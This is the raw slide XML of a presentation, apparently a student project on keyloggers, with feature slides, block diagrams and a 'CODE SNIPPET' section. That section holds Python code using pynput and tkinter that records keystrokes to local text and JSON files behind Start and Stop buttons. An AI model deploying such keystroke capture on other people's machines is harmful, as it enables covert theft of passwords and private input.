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5.jpg" ContentType="image/jpg"/>
  <Override PartName="/ppt/media/image10.jpg" ContentType="image/jpg"/>
  <Override PartName="/ppt/media/image11.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2" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId19"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="276" r:id="rId3"/>
    <p:sldId id="277" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="268" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="273" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="265" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="275"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D0F802-ADF2-42F8-BF91-73DAE5C61C84}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>09-06-2024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836D823-EF93-4EE3-B656-469833966D82}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227563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36D823-EF93-4EE3-B656-469833966D82}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="640454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6/9/2024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29082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37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688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105388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7856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28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6/9/2024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94876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3340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212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667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56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6/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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55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6/9/2024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245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6/9/2024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594318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33599" y="986309"/>
            <a:ext cx="1743075" cy="1333500"/>
            <a:chOff x="742950" y="1104900"/>
            <a:chExt cx="1743075" cy="1333500"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="1696755"/>
            <a:ext cx="2867026" cy="2143124"/>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543050" y="199595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solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="2634034"/>
            <a:ext cx="7467600" cy="1678665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3213735">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" spc="15" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hari Sai Kumar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" spc="15" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Thatholu</a:t>
            </a:r>
            <a:endParaRPr sz="5400" spc="15" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803"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8961120" y="4297801"/>
            <a:ext cx="23545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Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>KEY LOGGER</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCA455C-2D4B-451C-9B25-2D8A0D35309D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395287" y="2768317"/>
            <a:ext cx="3743325" cy="3190876"/>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bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2FDD6DC-9E17-4E7E-BEA4-E6E571B57EE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4419600" y="4230046"/>
            <a:ext cx="1743075" cy="1333500"/>
            <a:chOff x="742950" y="1104900"/>
            <a:chExt cx="1743075" cy="1333500"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05CBBCE8-840C-458F-A676-381EE455C611}"/>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14" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20405A91-1B3C-4A4A-8CBF-EE22D3535902}"/>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15" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADBEA6E5-B156-4F34-A95B-EE7D6505C5E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3829051" y="523969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solid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2006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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>THE WOW IN THE SOLUTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C055EFD-16FB-B0CB-6069-4F9A665FB300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2478704" y="1228505"/>
            <a:ext cx="904875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Highlighting the unique features and benefits of our key logger.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Unique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Logging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Instantly logs and displays keystrokes.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 to customize the logging format and frequency.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impact on system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Logging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Live Demo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Showing the key logger in action, logging keystrokes in real-time.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Experience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Demonstrating the ease of use and intuitive interface.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DB53D6-783A-755A-8804-71CB1CC5F8F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="914400"/>
            <a:ext cx="10744200" cy="1692771"/>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Testimonials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Positive feedback from beta users and early adopters.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Statistics on efficiency and reliability from testing.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33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1C5F-EBE2-28DD-FD0D-EC018423E39F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="385444"/>
            <a:ext cx="10681335" cy="553998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MODELING</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600"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EEB26FFF-554D-ACAA-BC01-A94C4D12C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 y="1266320"/>
            <a:ext cx="3859857" cy="3557806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDB56EC-9F94-F75E-10A0-DAFC932427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355" y="1266320"/>
            <a:ext cx="3685604" cy="3587623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2CE6E0B-E804-3CC4-D9DF-7D5C1EF5EEDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329727" y="5029200"/>
            <a:ext cx="3962400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Block diagram of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>orking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2A7BB49-D2D6-DEEF-2CA3-9CC70B81AD2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4764236" y="5010632"/>
            <a:ext cx="3019842" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Keylogger</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6B49EA0-A2FE-FB38-59F8-B0493DB0FF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7457" y="1236503"/>
            <a:ext cx="3467100" cy="3587623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CF19D06-A1FF-248B-E17D-A0DE7609E6C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8541067" y="5029200"/>
            <a:ext cx="2895600" cy="4777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kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hardware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Based Keylogger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187091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4248-EFAD-E46B-63FC-5DCBCFFA6327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="-9525"/>
            <a:ext cx="10058400" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CODE SNIPPET</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3200" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B99C02B1-625E-1BA4-86CD-D194913757F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1067118"/>
            <a:ext cx="12344400" cy="5257482"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2"/>
          <a:lstStyle/>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tk</a:t>
            </a:r>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import *</a:t>
            </a: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pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>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json</a:t>
            </a:r>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a:p>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 []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys = ""</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generate_text_log</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with open('key_log.txt', "w+") as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keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key)</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with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>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wb</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key_log</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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json.dumps</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).encode()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key_log.write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on_press</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if flag == False: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{'Pressed':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flag = True</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    if flag == True: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{'Held':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on_release</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{'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>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77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45F31DD-911B-3712-9066-6A943F8AD6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="9646920" cy="6255559"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        flag = False</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generate_json_file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keys_used</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    keys = keys + str(key)</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generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(str(keys))</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listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keyboard.Listener</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listener.start</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 Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")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(state='disabled')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(state='normal')</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listener.stop</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(text="Keylogger stopped.")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(state='normal')</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(state='disabled’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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root = Tk()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
          </a:p>
          <a:p>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(anchor=CENTER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>label.pack</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start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Start", command=</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err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(side=LEFT)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stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Stop", command=</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 state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(side=RIGHT)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root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("250x250")</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root.mainloop</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277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US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>RESULTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1"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11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C47629CC-F0C1-8E62-D43C-41E441BBA031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="5590"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1219201"/>
            <a:ext cx="5486400" cy="4343400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
